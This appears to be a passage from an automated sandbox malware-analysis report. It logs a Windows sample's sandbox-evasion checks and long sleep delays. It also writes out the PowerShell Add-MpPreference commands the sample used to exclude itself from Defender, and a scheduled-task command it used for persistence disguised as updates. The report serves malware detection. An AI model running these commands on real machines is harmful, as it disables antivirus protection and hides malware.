                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Uv4EriqDCj.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7484, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 7A00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 75A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 8A00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 9A00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: A1E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: B1E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: C1E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: 4BC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 850000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 24F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 2260000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 6FF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 6BD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 7FF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 8FF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 97A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: A7A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: B7A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 1570000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 2F80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMemory allocated: 4F80000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7511Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 935Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7802Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1175Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWindow / User API: threadDelayed 3179Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWindow / User API: threadDelayed 4965Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWindow / User API: threadDelayed 2557
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWindow / User API: threadDelayed 6050
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exe TID: 2516Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exe TID: 7872Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exe TID: 7392Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe TID: 7612Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe TID: 7936Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe TID: 7828Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe TID: 7796Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeThread delayed: delay time: 922337203685477
                  Source: nXUcBcEOyROdbV.exe, 0000000F.00000002.1905103109.00000000013D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1860147976.0000000001022000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe"
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeMemory written: C:\Users\user\Desktop\Uv4EriqDCj.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Users\user\Desktop\Uv4EriqDCj.exe "C:\Users\user\Desktop\Uv4EriqDCj.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpBAFA.tmp"
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Users\user\Desktop\Uv4EriqDCj.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
